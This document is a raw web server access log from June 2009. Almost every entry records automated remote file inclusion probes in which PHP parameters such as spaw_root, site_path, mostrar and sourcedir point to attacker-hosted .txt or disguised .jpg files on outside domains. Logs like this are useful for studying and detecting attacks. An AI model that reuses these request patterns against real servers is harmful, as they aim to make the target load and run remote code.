211.43.195.120 - - [27/Jun/2009:06:17:40 -0500] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:06:17:40 -0500] "GET /logs/access_log.1237939200/admin/spaw/spaw_control.class.php?spaw_root=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:06:17:40 -0500] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:06:18:30 -0500] "GET /logs/access_log.1238716800/admin/spaw/spaw_control.class.php?spaw_root=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:19:12 -0500] "GET /errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:19:12 -0500] "GET /logs/access_log.1228608000%20%20/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:19:12 -0500] "GET /logs/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:06:21:13 -0500] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:06:21:13 -0500] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
211.43.195.120 - - [27/Jun/2009:06:21:13 -0500] "GET /logs/access_log.1237939200/admin/spaw/spaw_control.class.php?spaw_root=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:06:21:46 -0500] "GET /logs/access_log.1233705600/include/lib.inc.php?site_path=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
83.98.209.71 - - [27/Jun/2009:06:21:46 -0500] "GET /include/lib.inc.php?site_path=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
83.98.209.71 - - [27/Jun/2009:06:21:46 -0500] "GET /logs/include/lib.inc.php?site_path=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
83.98.209.71 - - [27/Jun/2009:06:21:46 -0500] "GET /logs/access_log.1233705600/include/lib.inc.php?site_path=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
83.98.209.71 - - [27/Jun/2009:06:21:46 -0500] "GET /include/lib.inc.php?site_path=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
83.98.209.71 - - [27/Jun/2009:06:21:46 -0500] "GET /logs/access_log.1227571200/include/lib.inc.php?site_path=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
83.98.209.71 - - [27/Jun/2009:06:21:46 -0500] "GET /logs/include/lib.inc.php?site_path=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
83.98.209.71 - - [27/Jun/2009:06:21:51 -0500] "GET /logs/access_log.1227571200/include/lib.inc.php?site_path=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
211.43.195.120 - - [27/Jun/2009:06:22:10 -0500] "GET /logs/access_log.1238716800/admin/spaw/spaw_control.class.php?spaw_root=http://www.kodae.ms.kr///wiach/id1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:22:57 -0500] "GET /logs/access_log.1229126400/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:06:23:11 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
83.98.209.71 - - [27/Jun/2009:06:23:11 -0500] "GET /logs/access_log.1233705600/includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
83.98.209.71 - - [27/Jun/2009:06:23:11 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
83.98.209.71 - - [27/Jun/2009:06:23:16 -0500] "GET /logs/access_log.1238630400/includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
84.201.208.50 - - [27/Jun/2009:06:23:21 -0500] "GET /logs/access_log.1228089600/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:23:21 -0500] "GET /logs/access_log.1229040000/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:23:26 -0500] "GET /logs/access_log.1226880000/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:23:36 -0500] "GET /logs/access_log.1225756800/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:23:41 -0500] "GET /logs/access_log.1228953600/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:23:41 -0500] "GET /logs/access_log.1230595200/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:23:45 -0500] "GET /logs/access_log.1227744000/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:23:45 -0500] "GET /logs/access_log.1234396800/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:23:45 -0500] "GET /logs/access_log.1229212800/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:23:50 -0500] "GET /logs/access_log.1228867200/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:23:50 -0500] "GET /logs/access_log.1226707200/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:23:50 -0500] "GET /logs/access_log.1235347200/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:23:54 -0500] "GET /logs/access_log.1233446400/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:23:59 -0500] "GET /logs/access_log.1230249600/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:24:04 -0500] "GET /logs/access_log.1231977600/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:24:04 -0500] "GET /logs/access_log.1236643200/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:24:04 -0500] "GET /logs/access_log.1232236800/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:24:09 -0500] "GET /logs/access_log.1226620800/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:24:09 -0500] "GET /logs/access_log.1235952000/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:24:09 -0500] "GET /logs/access_log.1229904000/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:24:18 -0500] "GET /logs/access_log.1233100800/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:24:18 -0500] "GET /logs/access_log.1235692800/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:24:18 -0500] "GET /logs/access_log.1230940800/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:24:18 -0500] "GET /logs/access_log.1225584000/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:06:24:21 -0500] "GET /errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:06:24:21 -0500] "GET /logs/access_log.1228608000%20%20/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:06:24:21 -0500] "GET /logs/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:06:24:24 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
83.98.209.71 - - [27/Jun/2009:06:24:24 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
83.98.209.71 - - [27/Jun/2009:06:24:24 -0500] "GET /logs/access_log.1233705600/includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
83.98.209.71 - - [27/Jun/2009:06:24:24 -0500] "GET /logs/access_log.1238630400/includes/ktedit/toolbar.php?dirDepth=http://aboutav.com//back/osiris.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
84.201.208.50 - - [27/Jun/2009:06:24:39 -0500] "GET /logs/access_log.1234483200/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:24:39 -0500] "GET /logs/access_log.1236038400/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:24:44 -0500] "GET /logs/access_log.1232064000/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:24:44 -0500] "GET /logs/access_log.1233014400/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:24:44 -0500] "GET /logs/access_log.1229731200/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:24:51 -0500] "GET /logs/access_log.1229472000/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
75.125.198.130 - - [27/Jun/2009:06:24:52 -0500] "GET /logs/access_log.1237248000//ftag.php?mostrar=http://www.sameta.ru/docs/baner.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
75.125.198.130 - - [27/Jun/2009:06:24:52 -0500] "GET //ftag.php?mostrar=http://www.sameta.ru/docs/baner.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
75.125.198.130 - - [27/Jun/2009:06:24:52 -0500] "GET /logs//ftag.php?mostrar=http://www.sameta.ru/docs/baner.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:24:58 -0500] "GET /logs/access_log.1235433600/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:25:03 -0500] "GET /logs/access_log.1235174400/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:25:03 -0500] "GET /logs/access_log.1225065600/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
75.125.198.130 - - [27/Jun/2009:06:25:14 -0500] "GET /logs/access_log.1241395200//ftag.php?mostrar=http://www.sameta.ru/docs/baner.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:25:17 -0500] "GET /logs/access_log.1234310400/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.201.208.50 - - [27/Jun/2009:06:25:17 -0500] "GET /logs/access_log.1231200000/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
209.172.33.230 - - [27/Jun/2009:06:26:07 -0500] "GET //ftag.php?mostrar=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
209.172.33.230 - - [27/Jun/2009:06:26:07 -0500] "GET /logs//ftag.php?mostrar=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
209.172.33.230 - - [27/Jun/2009:06:26:07 -0500] "GET /logs/access_log.1240617600//ftag.php?mostrar=http://www.hb.let.tw//xoops_lib/modules/protector/configs/baner.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
65.55.106.233 - - [27/Jun/2009:06:29:59 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.122.79.200 - - [27/Jun/2009:06:34:10 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://audioncable.net////AllplanPG/fx29id1.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
222.122.79.200 - - [27/Jun/2009:06:34:10 -0500] "GET /logs/access_log.1240012800//modules/agendax/addevent.inc.php?agendax_path=http://audioncable.net////AllplanPG/fx29id1.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
222.122.79.200 - - [27/Jun/2009:06:34:11 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://audioncable.net////AllplanPG/fx29id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
86.39.131.85 - - [27/Jun/2009:06:34:15 -0500] "GET /logs/access_log.1238889600/config.php?path_to_root=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
86.39.131.85 - - [27/Jun/2009:06:34:15 -0500] "GET /config.php?path_to_root=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
86.39.131.85 - - [27/Jun/2009:06:34:15 -0500] "GET /logs/config.php?path_to_root=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:06:34:15 -0500] "GET /logs/access_log.1239926400/index.php?meio=http://articlecentralstation.com/fx29id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:06:34:15 -0500] "GET /index.php?meio=http://articlecentralstation.com/fx29id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:06:34:15 -0500] "GET /logs/access_log.1240012800/index.php?meio=http://articlecentralstation.com/fx29id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:06:34:15 -0500] "GET /logs/index.php?meio=http://articlecentralstation.com/fx29id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:06:34:26 -0500] "GET /logs/access_log.1239926400/index.php?meio=http://articlecentralstation.com/fx29id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:06:34:26 -0500] "GET /index.php?meio=http://articlecentralstation.com/fx29id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:06:34:26 -0500] "GET /logs/access_log.1240012800/index.php?meio=http://articlecentralstation.com/fx29id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:06:34:26 -0500] "GET /logs/index.php?meio=http://articlecentralstation.com/fx29id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
222.122.79.200 - - [27/Jun/2009:06:34:38 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://audioncable.net////AllplanPG/fx29id1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
222.122.79.200 - - [27/Jun/2009:06:34:38 -0500] "GET /logs/access_log.1240012800//modules/agendax/addevent.inc.php?agendax_path=http://audioncable.net////AllplanPG/fx29id1.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
222.122.79.200 - - [27/Jun/2009:06:34:38 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://audioncable.net////AllplanPG/fx29id1.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
222.122.79.200 - - [27/Jun/2009:06:35:00 -0500] "GET /logs/access_log.1239667200//modules/agendax/addevent.inc.php?agendax_path=http://audioncable.net////AllplanPG/fx29id1.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
222.122.79.200 - - [27/Jun/2009:06:35:29 -0500] "GET /logs/access_log.1239667200//modules/agendax/addevent.inc.php?agendax_path=http://audioncable.net////AllplanPG/fx29id1.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
85.17.162.28 - - [27/Jun/2009:06:36:31 -0500] "GET /?sourcedir=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
85.17.162.28 - - [27/Jun/2009:06:36:31 -0500] "GET /logs/access_log.1242000000/?sourcedir=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
85.17.162.28 - - [27/Jun/2009:06:36:33 -0500] "GET /logs/?sourcedir=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 200 194912 "-""Mozilla/5.0"
85.17.162.28 - - [27/Jun/2009:06:36:41 -0500] "GET /logs/access_log.1241568000/?sourcedir=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
85.17.162.28 - - [27/Jun/2009:06:37:30 -0500] "GET /logs/access_log.1242000000/?sourcedir=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
85.17.162.28 - - [27/Jun/2009:06:37:30 -0500] "GET /?sourcedir=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:06:37:31 -0500] "GET /logs/access_log.1229126400/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.17.162.28 - - [27/Jun/2009:06:37:32 -0500] "GET /logs/?sourcedir=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 200 194912 "-""Mozilla/5.0"
85.17.162.28 - - [27/Jun/2009:06:37:39 -0500] "GET /logs/access_log.1241568000/?sourcedir=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:06:38:03 -0500] "GET /logs/access_log.1229040000/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:06:38:04 -0500] "GET /logs/access_log.1228089600/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:06:38:11 -0500] "GET /logs/access_log.1226880000/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:06:38:38 -0500] "GET /logs/access_log.1225756800/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:06:38:40 -0500] "GET /logs/access_log.1230595200/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:06:38:50 -0500] "GET /logs/access_log.1228953600/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.120.231.11 - - [27/Jun/2009:06:38:50 -0500] "GET /logs/access_log.1237248000/?npage=1&content_dir=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
216.120.231.11 - - [27/Jun/2009:06:38:50 -0500] "GET /?npage=1&content_dir=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
216.120.231.11 - - [27/Jun/2009:06:38:50 -0500] "GET /logs/access_log.1240444800/?npage=1&content_dir=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:06:38:50 -0500] "GET /logs/access_log.1234396800/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:06:38:50 -0500] "GET /logs/access_log.1229212800/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:06:38:50 -0500] "GET /logs/access_log.1227744000/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.120.231.11 - - [27/Jun/2009:06:38:51 -0500] "GET /logs/?npage=1&content_dir=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 200 194912 "-""Mozilla/5.0"
85.17.162.28 - - [27/Jun/2009:06:38:53 -0500] "GET /logs/access_log.1242000000/?sourcedir=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
85.17.162.28 - - [27/Jun/2009:06:38:53 -0500] "GET /?sourcedir=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
85.17.162.28 - - [27/Jun/2009:06:38:54 -0500] "GET /logs/?sourcedir=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 200 194912 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
83.16.182.130 - - [27/Jun/2009:06:39:00 -0500] "GET /logs/access_log.1228867200/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:06:39:03 -0500] "GET /logs/access_log.1226707200/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:06:39:05 -0500] "GET /logs/access_log.1235347200/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:06:39:10 -0500] "GET /logs/access_log.1233446400/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:06:39:16 -0500] "GET /logs/access_log.1230249600/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:06:39:21 -0500] "GET /logs/access_log.1231977600/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:06:39:21 -0500] "GET /logs/access_log.1236643200/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:06:39:23 -0500] "GET /logs/access_log.1232236800/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:06:39:26 -0500] "GET /logs/access_log.1226620800/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.17.162.28 - - [27/Jun/2009:06:39:28 -0500] "GET /logs/access_log.1242000000/?sourcedir=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 404 310 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
85.17.162.28 - - [27/Jun/2009:06:39:28 -0500] "GET /?sourcedir=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 200 3245 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
85.17.162.28 - - [27/Jun/2009:06:39:31 -0500] "GET /logs/?sourcedir=http://www.cecilcap.org/smf/cfg?? HTTP/1.1" 200 194912 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
83.16.182.130 - - [27/Jun/2009:06:39:32 -0500] "GET /logs/access_log.1235952000/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:06:39:32 -0500] "GET /logs/access_log.1229904000/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
83.16.182.130 - - [27/Jun/2009:06:39:40 -0500] "GET /logs/access_log.1230940800/errors.php?error=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
